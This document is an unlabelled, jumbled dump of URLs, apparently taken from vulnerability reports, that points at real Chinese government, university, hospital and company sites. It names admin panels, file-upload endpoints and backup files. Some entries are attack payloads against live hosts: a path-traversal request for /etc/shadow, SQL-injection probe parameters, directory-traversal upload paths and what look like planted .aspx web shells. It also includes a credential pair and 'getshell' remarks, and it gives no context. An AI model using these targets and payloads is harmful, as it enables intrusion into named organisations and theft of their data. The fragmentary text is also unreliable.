http://wap.l0086csh.com/ http://vvj10086.com/admin/login.asp http://wap.l0086csh.com/admin/login.asp http://m.ibeiliao.com/yanzhengma.php http://bbs.58wan.com//uc_server/data/config.inc.php.bak http://down.chinaz.com/soft/35447.htm http://www.edayshop.com/ inurl:sp.asp?sx= http://freetuan.net/admins/ http://www.epqy.cn/dgt/admins/ http://www.damagz.com/admins/ http://tuan.07551.com.cn/admins/ http://www.syftmy.com/tuan/admins/ http://地址/org_execl_download.action?filename=../../../../../../etc/shadow http://218.78.241.80/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a http://oa.w12z.com/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a http://www.gxbyzx.cn:88/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a http://www.xwgjzx.com:8888/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a http://szxx.pudong-edu.sh.cn/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a inurl:jcl_type.asp?id= http://www.cgjgroup.com/jcl_type.asp?id=30 http://www.sxkaize.cn/jcl_type.asp?id=45 http://www.xyrip.com/jcl_type.asp?id=30 http://www.sxhyys.com/jcl_type.asp?id=30 http://www.13xiang.cn/jcl_type.asp?id=31 http://www.hyxzfw.gov.cn/guestbook_read.asp?id=37 http://www.jmepb.gov.cn/guestbook_read.asp?id=1825 http://www.jmpic.gov.cn/guestbook_read.asp?id=22035 http://jshuaqiao.com/guestbook_read.asp?id=1736 http://202.103.11.102/guestbook_read.asp?id=21595 http://www.nonobank.com/Register http://admin.ibeiliao.com/index.php/login.in http://admin.ibeiliao.com/aquincum/messages.html http://218.78.241.80/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://www.gxbyzx.cn:88/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://oa.w12z.com/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://www.xwgjzx.com:8888/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://szxx.pudong-edu.sh.cn/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://www.gdyf.lss.gov.cn/ForJobDetail.aspx?ID=425 http://210.76.66.108/hyyy/ www.qqhrgaj.gov.cn:8088/News/view_video.action Http://36.250.159.106:5155/mhpublic.apk Http://36.250.159.106:5156/mhdoctor.apk http://*/admin Http://36.250.159.106:5155/admin http://36.250.159.106:5255/admin http://36.250.159.106:5256/admin http://36.250.159.106:9000/admin http://36.250.159.106:9000/avatars/020b2328-2960-49b9-a667-c12b357a4ac3.aspx http://修改我:端口/Admin/StaffMag/UploadStaffImg http://36.250.159.106:5155/avatars/332894e8-c643-4bd4-924a-b65658168f72.aspx http://36.250.159.106:5256/avatars/f5706c38-eed3-4cee-a656-61cef2c440c4.aspx http://36.250.159.106:5255/avatars/b1644026-56dd-4014-b5f0-640b0dceea75.aspx http://36.250.159.106:5155 http://36.250.159.106:5155/api/Staff/GetStaffList http://36.250.159.106:5255/api/Staff/GetStaffList http://36.250.159.106:5256/api/Staff/GetStaffList http://36.250.159.106:9000/api/Staff/GetStaffList http://mdyy.mh.zoesoft.net:5256/Admin/StaffMag/Index http://mdyy.mh.zoesoft.net:5256/api/Staff/GetStaffList http://mdyy.mh.zoesoft.net:5155/api/Staff/GetStaffList http://mdyy.mh.zoesoft.net:5156/api/Staff/GetStaffList http://mdyy.mh.zoesoft.net:5255/api/Staff/GetStaffList http://www.m6go.com/user/regSuc.do?UserID=734188 http://tclcomm.com http://tclcomm.com/news/news_content.asp?articleid=2452 http://tclcomm.com/news/news_content.asp?articleid=2452 http://test.nitc.cc/office/privilege.php?action=login http://gs.njfu.edu.cn/Gmis/xw/tdxlshtsh.aspx http://202.203.225.17:8080/Gmis/xw/tdxlshtsh.aspx http://218.75.27.177/Gmis/xw/tdxlshtsh.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xw/tdxlshtsh.aspx http://101.76.99.20/Gmis/xw/tdxlshtsh.aspx http://61.187.179.68:8080/Gmis/xw/tdxlshtsh.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xw/tdxlshtsh.aspx http://210.43.126.80:8080/Gmis/xw/tdxlshtsh.aspx http://211.64.205.214/Gmis/xw/tdxlshtsh.aspx http://211.64.205.214/Gmis/xw/tdxlshtsh.aspx http://hao.tcl.com/examples/servlets/servlet/SessionExample http://hao.tcl.com//examples/servlets/index.html http://www.pengpengmall.com/info.php http://battery.tcl.com/read_news.php?id=1 http://gs.njfu.edu.cn/Gmis/xw/xsfblwdj.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xsfblwdj.aspx?xh=1 http://218.75.27.177/Gmis/xw/xsfblwdj.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xsfblwdj.aspx?xh=1 http://101.76.99.20/Gmis/xw/xsfblwdj.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xsfblwdj.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xsfblwdj.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xsfblwdj.aspx?xh=1 http://211.64.205.214/Gmis/xw/xsfblwdj.aspx?xh=1 http://211.64.205.214/Gmis/xw/xsfblwdj.aspx?xh=1 http://221.237.155.48:82/ http://113.200.189.166:8080/NAS/customer/customer_login.action http://union.lashou.com/ http://union.lashou.com/index.php?r=effect/site/site&id=5444 http://gs.njfu.edu.cn/Gmis/xw/xlsyjsyxwsh.aspx http://202.203.225.17:8080/Gmis/xw/xlsyjsyxwsh.aspx http://218.75.27.177/Gmis/xw/xlsyjsyxwsh.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xw/xlsyjsyxwsh.aspx http://101.76.99.20/Gmis/xw/xlsyjsyxwsh.aspx http://61.187.179.68:8080/Gmis/xw/xlsyjsyxwsh.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xlsyjsyxwsh.aspx http://210.43.126.80:8080/Gmis/xw/xlsyjsyxwsh.aspx http://211.64.205.214/Gmis/xw/xlsyjsyxwsh.aspx http://210.43.126.80:8080/Gmis/xw/xlsyjsyxwsh.aspx http://202.203.225.17:8080/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://218.75.27.177/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://101.76.99.20/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://218.75.27.177/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://gs.njfu.edu.cn/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://218.75.27.177/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://101.76.99.20/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://211.64.205.214/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://211.64.205.214/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://gs.njfu.edu.cn/Gmis/xw/dbtljgsh.aspx?id=1 http://202.203.225.17:8080/Gmis/xw/dbtljgsh.aspx?id=1 http://218.75.27.177/Gmis/xw/dbtljgsh.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/dbtljgsh.aspx?id=1 http://101.76.99.20/Gmis/xw/dbtljgsh.aspx?id=1 http://61.187.179.68:8080/Gmis/xw/dbtljgsh.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/dbtljgsh.aspx?id=1 http://210.43.126.80:8080/Gmis/xw/dbtljgsh.aspx?id=1 http://211.64.205.214/Gmis/xw/dbtljgsh.aspx?id=1 http://211.64.205.214/Gmis/xw/dbtljgsh.aspx?id=1 http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://m.yoger.com.cn/class.php?classid=19&sort=%E8%B7%91%E6%AD%A5%E8%A3%85%E5%A4%87 http://m.yoger.com.cn/product_list_info.php?brand=brand&search=%E8%83%9C%E5%88%A9Victor&sort=comments_d http://m.yoger.com.cn/product_list_info.php?classid=1029&sort=comments_d&sx= http://gs.njfu.edu.cn/Gmis/xw/dbtljgxg.aspx?id=1 http://202.203.225.17:8080/Gmis/xw/dbtljgxg.aspx?id=1 http://218.75.27.177/Gmis/xw/dbtljgxg.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/dbtljgxg.aspx?id=1 http://101.76.99.20/Gmis/xw/dbtljgxg.aspx?id=1 http://61.187.179.68:8080/Gmis/xw/dbtljgxg.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/dbtljgxg.aspx?id=1 http://210.43.126.80:8080/Gmis/xw/dbtljgxg.aspx?id=1 http://211.64.205.214/Gmis/xw/dbtljgxg.aspx?id=1 http://gs.njfu.edu.cn/Gmis/xw/dbtljgxg.aspx?id=1 http://admin.union.tudou.com/ http://218.76.120.55/ http://222.245.246.242 http://222.244.83.117 http://222.244.38.192 http://222.243.117.30/ http://222.242.28.188 http://222.242.5.32 http://222.242.1.211 http://222.241.161.38 http://222.240.106.203 http://222.240.55.16/ http://gs.njfu.edu.cn/Gmis/xw/fwhtlxxxg.aspx http://202.203.225.17:8080/Gmis/xw/fwhtlxxxg.aspx http://218.75.27.177/Gmis/xw/fwhtlxxxg.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xw/fwhtlxxxg.aspx http://101.76.99.20/Gmis/xw/fwhtlxxxg.aspx http://61.187.179.68:8080/Gmis/xw/fwhtlxxxg.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xw/fwhtlxxxg.aspx http://210.43.126.80:8080/Gmis/xw/fwhtlxxxg.aspx http://210.43.126.80:8080/Gmis/xw/fwhtlxxxg.aspx http://gs.njfu.edu.cn/Gmis/xw/fwhclcxmx.aspx?id=1 http://202.203.225.17:8080/Gmis/xw/fwhclcxmx.aspx?id=1 http://218.75.27.177/Gmis/xw/fwhclcxmx.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/fwhclcxmx.aspx?id=1 http://101.76.99.20/Gmis/xw/fwhclcxmx.aspx?id=1 http://61.187.179.68:8080/Gmis/xw/fwhclcxmx.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/fwhclcxmx.aspx?id=1 http://210.43.126.80:8080/Gmis/xw/fwhclcxmx.aspx?id=1 http://211.64.205.214/Gmis/xw/fwhclcxmx.aspx?id=1 http://gs.njfu.edu.cn/Gmis/xw/fwhclcxmx.aspx?id=1 http://211.3.166.117/index.htm http://210.237.217.5/index.htm http://210.238.99.253/ http://210.1.212.160/index.htm http://193.169.227.11/index.htm http://121.208.2.208/index.htm http://gs.njfu.edu.cn/Gmis/xw/fwhtlgjscedit.aspx?id= http://202.203.225.17:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://218.75.27.177/Gmis/xw/fwhtlgjscedit.aspx?id= http://yjsy.wmu.edu.cn:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://101.76.99.20/Gmis/xw/fwhtlgjscedit.aspx?id= http://61.187.179.68:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://yjsy.wzmc.edu.cn:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://210.43.126.80:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://211.64.205.214/Gmis/xw/fwhtlgjscedit.aspx?id= http://211.64.205.214/Gmis/xw/fwhtlgjscedit.aspx?id= http://210.43.126.80:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://gs.njfu.edu.cn/Gmis/xw/fwhlrxxedit.aspx?id= http://202.203.225.17:8080/Gmis/xw/fwhlrxxedit.aspx?id= http://218.75.27.177/Gmis/xw/fwhlrxxedit.aspx?id= http://yjsy.wmu.edu.cn:8080/Gmis/xw/fwhlrxxedit.aspx?id= http://101.76.99.20/Gmis/xw/fwhlrxxedit.aspx?id= http://61.187.179.68:8080/Gmis/xw/fwhlrxxedit.aspx?id= http://yjsy.wzmc.edu.cn:8080/Gmis/xw/fwhlrxxedit.aspx?id= http://210.43.126.80:8080/Gmis/xw/fwhlrxxedit.aspx?id= http://211.64.205.214/Gmis/xw/fwhlrxxedit.aspx?id= http://211.64.205.214/Gmis/xw/fwhlrxxedit.aspx?id= http://gs.njfu.edu.cn/Gmis/xw/fwhtlclcx.aspx http://202.203.225.17:8080/Gmis/xw/fwhtlclcx.aspx http://218.75.27.177/Gmis/xw/fwhtlclcx.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xw/fwhtlclcx.aspx http://101.76.99.20/Gmis/xw/fwhtlclcx.aspx http://61.187.179.68:8080/Gmis/xw/fwhtlclcx.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xw/fwhtlclcx.aspx http://210.43.126.80:8080/Gmis/xw/fwhtlclcx.aspx http://211.64.205.214/Gmis/xw/fwhtlclcx.aspx http://211.64.205.214/Gmis/xw/fwhtlclcx.aspx http://zxft.dongying.gov.cn/dyvideo/index.php?option=com_content&view=article&id=465&Itemid=84 http://oa.lib.xjtu.edu.cn/oa.do?start=1-9 http://showadmin.pipi.cn,会跳转到http://showadmin.chengxing.tv/ http://www.scti.cn/WebSiteMaintain2014/checkLogOn.do http://123.124.148.248:8888/dap/dtalent/drs/default/commonPage.jsp?innercode=007 http://123.124.148.248:8888 http://www.jenomc.com/stk/memberUnits.jsp index.php/api/testdrive_dealers http://www.gysml.cn/News/newlist.do?PrtID=1 http://www.zzzsjy.cn/News/newlist.do?PrtID=2 http://www.sysqjyw.cn/News/newlist.do?PrtID=1 http://www.xtsqedu.com/News/newlist.do?PrtID=1 http://www.ntsmxx.net/News/newlist.do?PrtID=2 http://www.ycgjw.cn/News/newlist.do?PrtID=4 http://www.zzzsjy.cn/News/newlist.do?PrtID=2 http://www.tystudy.cn/News/newlist.do?PrtID=1 http://www.yzqxxw.com/News/newlist.do?PrtID=1 http://wssp.fsxzfw.gov.cn/ http://fw.hzzk.gov.cn/ http://wsbs.xinhui.gov.cn/ http://bsdt.baoan.gov.cn/ http://www.lib.xjtu.edu.cn/bookriview.do http://www.lib.xjtu.edu.cn/news.do http://easyad.cig.com.cn/dmp/report/domaindate_zhuyuming_zi?domain=cig.com.cn&date=2012-09-30 http://www.186online.com/usermanager/login.do http://www.186online.com/usermanager/login.do http://gs.njfu.edu.cn/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://218.75.27.177/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://101.76.99.20/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://211.64.205.214/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://211.64.205.214/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://jpkc.wzu.edu.cn/xdjyjs/exam/admin/Login.aspx https://github.com/katogenzo/Complex/blob/master/config/site-config.xml http://guobozhaopin.chnmuseum.cn/dap/dtalent/drs/default/commonPage.jsp?innercode=007 http://guobozhaopin.chnmuseum.cn http://**.**.**/ http://**.**.**/ http://www.zjdy.gov.cn/News/List.asp?Newsid=2604 site:cig.com.cn http://www.cig.com.cn/maz/detail.aspx?nid=31 http://www.cig.com.cn/maz/list.aspx demo2:demodemo http://show.wecrm.com/xt/CompanyPlatform/GetBbsDataList/ http://show.wecrm.com www.qysi.gov.cn/websys/jsp/website/wwwserver/wwwserver.jsp?org_id=001 http://www.xiangshe.com/www.xiangshe.com.rar http://202.96.24.7/login/lg.action存在struts2漏洞 http://yy.cymy.edu.cn/ShowNotice.asp?ID=25 wsjws.gzga.gov.cn/introduce.aspxpid=782cfa78666f4a7f990b1dd26a851b01 https://github.com/DevilRock/MonitorSummary/blob/57dd4248ffbf928371eecb623e01741617fd85ce/src/com/chinacache/rock/conf/MailConfig.java http://125.69.90.148:88/index/ http://cnp.spqi.gov.cn http://cnp.spqi.gov.cn/textfile.asp?zlm=&nclassid=183 http://log.dfsk.dma.cig.com.cn/login http://log.yiqi.autodmp.cig.com.cn/login http://chana-mazda.dma.cig.com.cn/ http://log.yiqi.autodmp.cig.com.cn/account/forget_passwd http://chana-mazda.dma.cig.com.cn www.gdmm110.cn/_ http://wooyun.org/bugs/wooyun-2015-0104081/trace/b52e42dc36a6fdc701f611033860edb0 http://www.cctv.com/specials/1999spring/cj/wshk/card.txt http://www.hyxzfw.gov.cn/zxjb_read.asp?id=3401 http://www.gzshebao.org/zxjb_read.asp?id=2311 http://www.wyxzfw.com/zxjb_read.asp?id=3426 http://jshuaqiao.com/zxjb_read.asp?id=2384 http://60.8.102.174/zxjb_read.asp?id=1975 http://www.gorrun.cn/index.php/channel/cases/ http://sqlmap.org http://br.gzhu.edu.cn/Norm.asp?id_code=0011 http://115.28.27.119/ www.m6go.com什么关系? http://www.xiangshe.com/www.xiangshe.com.rar http://www.xxhjy.cn/Machinery/showspic.asp?id=1 http://www.chinashy.com.cn/ http://www.chinashy.com.cn/install/install.php http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://hhb.cig.com.cn http://esp.haier.com/account/ http://esp.haier.com/archive/ http://esp.haier.com/connect/ http://esp.haier.com/demo/ http://esp.haier.com/admin/user/ http://esp.haier.com/tools/ http://esp.haier.com/upload/ http://esp.haier.com/user/ http://esp.haier.com/WebService/ http://gd.10086.cn/hcareer/society/Resume/EduInfo.aspx?id=286(id任意) http://emba.njust.edu.cn/jiaowu.asp?cid=115 http://www.xinli001.com/user/article/44441554/ https://biz.vvipone.com/v/employee/edit?id=2 http://www.twxinyang.com/shop/class/index.php?catid=0&showbrandid=0&key=a&imageField.x=33&imageField.y=9 http://www.81yy.com/disease_news.php?dis_id=1201016005 url://210.44.80.14/jiaowu/Login_xsmm.asp http://group.xinli001.com/1/44642824/ android:exported="false",若需要外部调用,需自定义signature或者signatureOrSystem级别的权限 www.bobo.com http://i.yiche.com/authenservice/AboutPassWord/RetrievePassword.aspx http://www.viewgood.com/ http://demo.viewgood.com先注册个账号 http://www.bawang.com.cn/System/ http://www.bawang.com.cn/admin/ http://www.bawang.com.cn/system/eWebEditor/admin/ http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir= http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../ http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../AppServ/www www.elifepay.com.cn http://www.haiertv.cn/appstoreView/newsInfo.xhtml?wmsShopAnnounce.announceId=30 http://app.scloudm.com/app/push_app_info http://xxxxxxx http://www.ztgame.com/releasexxx http://xxxxxxx http://www.ztgame.com/releasexxx http://xxxxxxx123详细介绍,测试数据测试名称com.ztgame.juren12354454222http://www.ztgame.com/releasexxxIOS更新1.0正式版,更多新功能 http://xxxxxxx123详细介绍,测试数据测试名称com.ztgame.juren12354454222http://www.ztgame.com/releasexxxIOS更新1.0正式版,更多新功能 http://app.scloudm.com/app/push_app_info?app_updtime=1414576078&category=1&cover_img=&description=%E7%AE%80%E4%BB%8B%EF%BC%8C%E6%B5%8B%E8%AF%95%E6%95%B0%E6%8D%AE&developer=%E5%B7%A8%E4%BA%BA&icon_img=http%3A%2F%2Fxxxxxxx&id=123&intro=%E8%AF%A6%E7%BB%86%E4%BB%8B%E7%BB%8D%EF%BC%8C%E6%B5%8B%E8%AF%95%E6%95%B0%E6%8D%AE&name=%E6%B5%8B%E8%AF%95%E5%90%8D%E7%A7%B0&pkg_name=com.ztgame.juren&pkg_size=12354454222&pkg_url=http%3A%2F%2Fwww.ztgame.com%2Freleasexxx&platform=IOS&screenshots=&upd_info=%E6%9B%B4%E6%96%B01.0%E6%AD%A3%E5%BC%8F%E7%89%88%EF%BC%8C%E6%9B%B4%E5%A4%9A%E6%96%B0%E5%8A%9F%E8%83%BD+%EF%BC%8C%E4%BF%AE%E5%A4%8Dbug%EF%BC%8Ciphone6Plus%E9%80%82%E9%85%8D&version=v1.0.0&sign=6e616467a1273b30ac29346466366475 http://app.scloudm.com/app/push_app_shutdown http://www.scloudm.com/aboutus.php http://60.28.217.138:11211 http://yhk.wiselong.com:8080/ccbs/ccbs/order/showOrderList.do?method=showOrderDetailJsp&orderId=912111&isStorePage=Y http://yhk.wiselong.com:8080/ccbs http://www.zc511.com/showIndex.do Parameter:productCode http://www.smdyf.cn/getProductQulificationFileAndRegisterFile.do?productCode=47970 http://www.yizheng.cc/getProductQulificationFileAndRegisterFile.do?productCode=15089 http://www.jhtht.com/getProductQulificationFileAndRegisterFile.do?productCode=1060100054 http://www.nbzyyy.com/getProductQulificationFileAndRegisterFile.do?productCode=09253 http://www.wzyst.net/getProductQulificationFileAndRegisterFile.do?productCode=30926163 http://202.96.85.177/web/questionnaire/taxSchoolWebQuestionnaireActions!toQuestionnaire.action http://202.96.85.177/web/taxSchoolWebSecurityActions!jump.action http://localhost/KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1 http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1 http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D2 http://union.zhuna.cn/user/ajaxarea.asp?Id=6&TypeID=CityID http://cg.lashou.com/login.php?from=wap# http://fec.sicnu.edu.cn/announceDetail.aspx?announceid=69 http://fzxy.sicnu.edu.cn/Second.asp?ID=111 http://www.xtrcb.net/khyy/login.asp http://m.mindcity.sina.com.tw/gtest/question.php?id=2037 http://www.minjiao.com/ inurl:web_programs_dotnet http://www.gdaudit.gov.cn/ http://www.gdaudit.gov.cn/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File jsp:root xmlns:jsp="http://java.sun.com/JSP/Page http://www.w3.org/1999/xhtml xmlns:c="http://java.sun.com/jsp/jstl/core jsp:directive.page jsp:directive.page jsp:directive.page jsp:scriptlet http://openapi.lenovomm.com/music/admin.jsp http://www.96956.com.cn/uapssoweb/login/logintv!ssoLogin?channelcode=1001&citycode=FS&returl=1 http://www.96956.com.cn/uapssoweb/login/login!ssoLogin?channelcode=1001&citycode=root&returl=1 http://www.96956.com.cn/uapssoweb/login/ http://sqlmap.org inurl:/pmember.asp http://www.dlcxdrc.com//psearch.asp?key=::%C7%EB%D1%A1%D2%EB%D6%B0%CE%BB%C0%E0%B1%F0::&gzdd=noxz&city=%B2%BB%CF%DE&data=%B2%BB%CF%DE http://www.cxdrc.com//psearch.asp?key=::%C7%EB%D1%A1%D2%EB%D6%B0%CE%BB%C0%E0%B1%F0::&gzdd=noxz&city=%B2%BB%CF%DE&data=%B2%BB%CF%DE http://www.lncyrc.com.cn//psearch.asp?key=::%C7%EB%D1%A1%D2%EB%D6%B0%CE%BB%C0%E0%B1%F0::&gzdd=noxz&city=%B2%BB%CF%DE&data=%B2%BB%CF%DE http://www.lnbprsrc.com//psearch.asp?key=::%C7%EB%D1%A1%D2%EB%D6%B0%CE%BB%C0%E0%B1%F0::&gzdd=noxz&city=%B2%BB%CF%DE&data=%B2%BB%CF%DE http://www.jobch263.com//psearch.asp?key=::%C7%EB%D1%A1%D2%EB%D6%B0%CE%BB%C0%E0%B1%F0::&gzdd=noxz&city=%B2%BB%CF%DE&data=%B2%BB%CF%DE http://blog.ifeng.com/usercp/index.php?op=theme http://pc.guild.9game.cn/ka/list ftp://www.shac.gov.cn http://tools.yahui.cc/main.php http://tclcomm.com/service/sernet.asp http://www.yhcs88.com/tzzn_read.asp?id=1432 http://www.ccxzwzx.gov.cn/tzzn_read.asp?id=3209 http://60.8.102.174/tzzn_read.asp?id=3225 http://www.wyxzfw.com/tzzn_read.asp?id=2780 http://www.hyxzfw.gov.cn/tzzn_read.asp?id=1439 www.sdnsf.gov.cn http://www.sdnsf.gov.cn/portal/sims2003/echoinfo.php?id=437 http://jytghc.ujn.edu.cn:8088 http://sjzx.scswl.cn getshellhttp://118.244.237.84:8080/enroll/enrollHome.action http://jwxt.tzpc.edu.cn/cscl.asp http://jwgl.jhu.cn/cscl.asp http://222.187.199.60/cscl.asp http://jwc.jljtxy.com.cn/cscl.asp http://211.70.120.101/cscl.asp http://180.209.64.10/cscl.asp http://218.78.241.80/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://www.gxbyzx.cn:88/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://oa.w12z.com/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://www.xwgjzx.com:8888/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://szxx.pudong-edu.sh.cn/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://www.anmai.net/ http://gyxx.cmjy.sh.cn/anmai/Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1 http://www.gxbyzx.cn:88/ANMAI/Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1 http://jmzx.xmedu.cn:9999/ANMAI/Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1 http://oa.w12z.com/ANMAI/Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1 http://222.74.3.166:8081/ANMAI//Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1 http://www.zc511.com/showIndex.do http://www.ewj2009.com/ http://www.nbzyyy.com/ http://wzyst.net/ http://www.yizheng.cc/ http://www.zjrrt.com/ http://www.zc511.com/showIndex.do Parameter:LoginName http://www.hangzhoudrt.com/findpwd.do http://www.xzdyf.cn/findpwd.do http://www.jhtht.com/findpwd.do http://www.wzyst.net/findpwd.do http://www.ewj2009.com/findpwd.do www.nm.zsks.cn http://mtest.yaya888.com/list.php?cat=1&id=62&f2=&f3=%E7%BF%BB%E7%9B%96&f4=%E5%85%A8%E9%94%AE%E7%9B%98&f5=%E6%97%A0%E6%91%84%E5%83%8F%E5%A4%B4&f6=IOS&price=1000-1499&f8=500%E4%B8%87%E5%83%8F%E7%B4%A0%E5%8F%8A%E4%BB%A5%E4%B8%8A&f9=2.1-3.0%E8%8B%B1%E5%AF%B8 http://cly.njtech.edu.cn/admin_login.htm http://222.177.182.34:8084/oas/home.action http://122.11.49.93/ http://www.hzzoy.com/ Parameter:LID http://www.bllib.net.cn:8080/lcd/lcd_Detail.html?LID=4905 http://218.2.112.243:8080/lcd/lcd_Detail.html?LID=495 http://202.197.107.11:86/lcd/lcd_Detail.html?LID=5776 http://163.21.191.31/lcd/lcd_Detail.html?LID=924 http://202.197.107.11:86/lcd/lcd_List.html?CategoryID=49 http://www.bllib.net.cn:8080/lcd/lcd_list.html?CategoryID=85 http://www.msit21.com/lcd/lcd_list.html?CategoryID=359 http://218.2.112.243:8080/lcd/lcd_List.html?CategoryID=240 http://163.21.191.31/lcd/lcd_List.html?CategoryID=21 http://xadyyypxks.gotoip3.com/hospital/course!showCourseDetail.action http://www.cn-dt.com.cn/cms/template/templateList.jsp http://www.cn-dt.com.cn//common/ http://www.cn-dt.com.cn/cms/ http://www.cn-dt.com.cn/extfile/ http://www.cn-dt.com.cn/conf/ http://www.cn-dt.com.cn/stat/ http://www.cn-dt.com.cn/stat/leftbar.jsp http://www.cn-dt.com.cn/conf/ConfInputList.jsp# http://www.cn-dt.com.cn/conf/leftbar.jsp http://www.cn-dt.com.cn/conf/mqueryDetail.jsp?link=cms_td_info_history http://www.cn-dt.com.cn/common/acc/leftbar.jsp http://www.cn-dt.com.cn/common/sweditor/时,我发现目录没有出来,我就http://www.cn-dt.com.cn/common/sweditor/CVS/Entries http://www.cn-dt.com.cn/common/sweditor/ewebeditor.htm http://jsgl.nxsl.gov.cn/common/toHtmlEdit.do?fld=icontent&mode=&id= http://替换我/common/sweditor/jsp/savefile.jsp?action=save&type=image&style=full&language=zh-cn&cusdir= http://121.28.34.69/hbwx/findcus.action http://www.nissan.com.cn/pivo/blog/detail.php?id=32 http://gxy.sxdtdx.edu.cn/i.html http://kjc.sxdtdx.edu.cn/i.html 